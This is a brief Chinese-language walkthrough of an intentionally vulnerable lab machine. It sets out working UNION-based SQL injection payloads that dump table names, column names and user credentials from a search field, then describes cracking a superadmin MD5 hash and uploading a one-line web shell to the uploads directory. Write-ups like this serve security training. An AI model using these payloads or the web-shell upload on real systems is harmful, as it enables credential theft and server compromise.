开启靶机
查看虚拟机设置,网络为NAT
使用另一台同为net的虚拟机扫描同网段,得到虚拟机ip,访问
网站会加载很长时间,直接打断就可以加载出来
开启后发现是登录界面,试了试弱口令不行,点击注册,
注册后登录
点击search,出现书名
验证sql注入,输入OSINT' and 1=1 # ,页面显示正常(前面随便写书名)
输入OSINT' and 1=2 # ,页面显示出错
判断列数,输入OSINT' order by 3 # ,页面显示正常
输入OSINT' order by 4 # ,页面显示错误,判断为3列
输入OSINT' union select 1,2,3 # ,查看回显点,得到回显点为1,2(可以直接将书名换成-1)
输入OSINT' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() # ,查看表名,发现users表
输入OSINT' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users' # ,查看列
OSINT' union select group_concat(user),group_concat(pasword),3 from users# 查看用户密码列
发现有个用户名为superadmin,密码为MD5加密密码,优先解密
点击退出,回到原页面登录
提交一句话木马,成功,直接加上文件名没找到,加上默认上传目录uploads试试成功
也可以使用虚拟机dirb扫描一下目录,发现拼接uploads路径,打开能发现上传的文件
流程到此结束,有错误或者问题欢迎指出